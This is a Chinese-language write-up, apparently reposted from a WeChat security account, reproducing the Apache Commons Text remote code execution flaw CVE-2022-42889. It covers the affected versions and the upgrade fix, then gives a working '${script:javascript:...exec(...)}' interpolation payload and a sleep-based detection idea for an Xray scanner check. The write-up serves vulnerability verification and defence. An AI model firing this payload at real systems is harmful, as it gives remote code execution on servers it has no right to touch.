CVE-2022-42889复现+Xray POC
漏洞简述
2022年10月13日 GMT+8 20:09:48
Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)
Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
影响范围
1.5 <= Apache Commons Text 版本<= 1.9
加固建议
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。 下载链接: https://commons.apache.org/proper/commons-text/download_text.cgi
参考链接
https://www.mail-archive.com/[email protected]/msg07643.html https://nvd.nist.gov/vuln/detail/CVE-2022-42889
漏洞复现
参考:https://github.com/search?q=cve-2022-42889
环境如下:
测试项
命令执行测试
1.命令执行成功,但是没有回显。
${script:javascript:java.lang.Runtime.getRuntime().exec('whomai')}
2.Dns验证 poc可以通过dnslog进行漏洞验证,但是无法带出当前用户名。
在容器中测试,可以带出用户名。
POC编写思路
使用延时函数进行漏洞验证。 测试延时3秒
java.lang.Thread.sleep(3000)
测试延时5秒
java.lang.Thread.sleep(5000)
测试成功!
编写Xray-POC
主动扫描:
被动扫描:
结果输入:
测试完毕。
5.躺平
结束
对了忘记说了,关注下公众号,谢谢。
原文始发于微信公众号(The Matrix):CVE-2022-42889复现+Xray POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论